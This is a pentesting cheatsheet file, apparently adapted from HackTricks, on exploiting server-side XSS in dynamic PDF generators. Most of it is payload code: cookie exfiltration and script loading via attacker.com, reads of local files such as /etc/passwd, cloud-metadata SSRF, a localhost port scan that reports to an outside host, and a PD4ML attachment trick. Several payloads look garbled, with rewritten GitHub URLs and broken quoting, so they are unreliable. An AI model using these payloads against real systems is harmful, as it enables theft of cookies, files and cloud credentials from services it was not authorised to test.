daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

server-side-xss-dynamic-pdf.md (10475B)


      1 ---
      2 title: "Server Side XSS (Dynamic PDF)"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Server Side XSS (Dynamic PDF)
     14 
     15 ## Server Side XSS (Dynamic PDF)
     16 
     17 If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
     18 So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
     19 
     20 Please, notice that the `<script></script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
     21 Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
     22 
     23 ### Popular PDF generation
     24 
     25 - **wkhtmltopdf** is known for its ability to convert HTML and CSS into PDF documents, utilizing the WebKit rendering engine. This tool is available as an open-source command line utility, making it accessible for a wide range of applications.
     26 - **TCPDF** offers a robust solution within the PHP ecosystem for PDF generation. It is capable of handling images, graphics, and encryption, showcasing its versatility for creating complex documents.
     27 - For those working in a Node.js environment, **PDFKit** presents a viable option. It enables the generation of PDF documents directly from HTML and CSS, providing a bridge between web content and printable formats.
     28 - Java developers might prefer **iText**, a library that not only facilitates PDF creation but also supports advanced features like digital signatures and form filling. Its comprehensive feature set makes it suitable for generating secure and interactive documents.
     29 - **FPDF** is another PHP library, distinguished by its simplicity and ease of use. It's designed for developers looking for a straightforward approach to PDF generation, without the need for extensive features.
     30 
     31 ## Payloads
     32 
     33 ### Discovery
     34 
     35 ```html
     36 <!-- Basic discovery, Write something-->
     37 <img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xss-cross-site-scripting/x" onerror="document.write('test')" />
     38 <script>document.write(JSON.stringify(window.location))</script>
     39 <script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
     40 
     41 <!--Basic blind discovery, load a resource-->
     42 <img src="http://attacker.com"/>
     43 <img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
     44 <script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
     45 <link rel=attachment href="http://attacker.com">
     46 
     47 <!-- Using base HTML tag -->
     48 <base href="http://attacker.com" />
     49 
     50 <!-- Loading external stylesheet -->
     51 <link rel="stylesheet" src="http://attacker.com" />
     52 
     53 <!-- Meta-tag to auto-refresh page -->
     54 <meta http-equiv="refresh" content="0; url=http://attacker.com/" />
     55 
     56 <!-- Loading external components -->
     57 <input type="image" src="http://attacker.com" />
     58 <video src="http://attacker.com" />
     59 <audio src="http://attacker.com" />
     60 <audio><source src="http://attacker.com"/></audio>
     61 <svg src="http://attacker.com" />
     62 ```
     63 
     64 ### SVG
     65 
     66 Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
     67 
     68 ```html
     69 <svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
     70     <g>
     71         <foreignObject width="800" height="500">
     72             <body xmlns="http://www.w3.org/1999/xhtml">
     73                 <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
     74                 <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
     75             </body>
     76         </foreignObject>
     77     </g>
     78 </svg>
     79 
     80 
     81 <svg width="100%" height="100%" viewBox="0 0 100 100"
     82      xmlns="http://www.w3.org/2000/svg">
     83   <circle cx="50" cy="50" r="45" fill="green"
     84           id="foo"/>
     85   <script type="text/javascript">
     86     // <![CDATA[
     87       alert(1);
     88    // ]]>
     89   </script>
     90 </svg>
     91 ```
     92 
     93 You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
     94 
     95 ### Path disclosure
     96 
     97 ```html
     98 <!-- If the bot is accessing a file:// path, you will discover the internal path
     99 if not, you will at least have wich path the bot is accessing -->
    100 <img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xss-cross-site-scripting/x" onerror="document.write(window.location)" />
    101 <script> document.write(window.location) </script>
    102 ```
    103 
    104 ### Load an external script
    105 
    106 The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.<sup>[[2]](#references)[[1]](#references)</sup>
    107 
    108 ```html
    109 <script src="http://attacker.com/myscripts.js"></script>
    110 <img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xss-cross-site-scripting/xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
    111 ```
    112 
    113 ### Read local file / SSRF
    114 
    115 > [!WARNING]
    116 > Change `file:///etc/passwd` for `http://169.254.169.254/latest/user-data` for example to **try to access an external web page (SSRF)**.
    117 >
    118 > If SSRF is allowed, but you **cannot reach** an interesting domain or IP, [check this page for potential bypasses](/hacktricks/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass).<sup>[[3]](#references)[[4]](#references)</sup>
    119 
    120 ```html
    121 <script>
    122 x=new XMLHttpRequest;
    123 x.onload=function(){document.write(btoa(this.responseText))};
    124 x.open("GET","file:///etc/passwd");x.send();
    125 </script>
    126 ```
    127 
    128 ```html
    129 <script>
    130     xhzeem = new XMLHttpRequest();
    131     xhzeem.onload = function(){document.write(this.responseText);}
    132     xhzeem.onerror = function(){document.write('failed!')}
    133     xhzeem.open("GET","file:///etc/passwd");
    134     xhzeem.send();
    135 </script>
    136 ```
    137 
    138 ```html
    139 <iframe src=file:///etc/passwd></iframe>
    140 <img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xss-cross-site-scripting/xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
    141 <link rel=attachment href="file:///root/secret.txt">
    142 <object data="file:///etc/passwd">
    143 <portal src="file:///etc/passwd" id=portal>
    144 <embed src="file:///etc/passwd>" width="400" height="400">
    145 <style><iframe src="file:///etc/passwd">
    146 <img src='https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xss-cross-site-scripting/x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
    147 <meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
    148 ```
    149 
    150 ```html
    151 <annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
    152 ```
    153 
    154 ### Bot delay
    155 
    156 ```html
    157 <!--Make the bot send a ping every 500ms to check how long does the bot wait-->
    158 <script>
    159     let time = 500;
    160     setInterval(()=>{
    161         let img = document.createElement("img");
    162         img.src = `https://attacker.com/ping?time=${time}ms`;
    163         time += 500;
    164     }, 500);
    165 </script>
    166 <img src="https://attacker.com/delay">
    167 ```
    168 
    169 ### Port Scan
    170 
    171 ```html
    172 <!--Scan local port and receive a ping indicating which ones are found-->
    173 <script>
    174 const checkPort = (port) => {
    175     fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
    176         let img = document.createElement("img");
    177         img.src = `http://attacker.com/ping?port=${port}`;
    178     });
    179 }
    180 
    181 for(let i=0; i<1000; i++) {
    182     checkPort(i);
    183 }
    184 </script>
    185 <img src="https://attacker.com/startingScan">
    186 ```
    187 
    188 ### [SSRF](../ssrf-server-side-request-forgery/index.html)
    189 
    190 This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).<sup>[[5]](#references)</sup>
    191 
    192 ### Attachments: PD4ML
    193 
    194 There are some HTML 2 PDF engines that allow to **specify attachments for the PDF**, like **PD4ML**. You can abuse this feature to **attach any local file** to the PDF.\
    195 To open the attachment I opened the file with **Firefox and double clicked the Paperclip symbol** to **store the attachment** as a new file.\
    196 Capturing the **PDF response** with burp should also **show the attachment in cleat text** inside the PDF.
    197 
    198 ```html
    199 <!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
    200 <html>
    201   <pd4ml:attachment
    202     src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src//etc/passwd"
    203     description="attachment sample"
    204     icon="Paperclip" />
    205 </html>
    206 ```
    207 
    208 ## References
    209 
    210 - [1] [lbherrera, H1-415 CTF writeup](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
    211 - [2] [buer.haus, "Escalating XSS in PhantomJS Image Rendering to SSRF/Local File Read"](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
    212 - [3] [noob.ninja, "Local File Read via XSS in Dynamically Generated PDF"](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
    213 - [4] [Breaking Down SSRF on PDF Generation: A Pentesting Guide](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)
    214 - [5] [Intigriti, "Exploiting PDF Generators: A Complete Guide to Finding SSRF Vulnerabilities in PDF Generators"](https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators)
    215 - [6] [HTB: Bucket (0xdf)](https://0xdf.gitlab.io/2021/04/24/htb-bucket.html)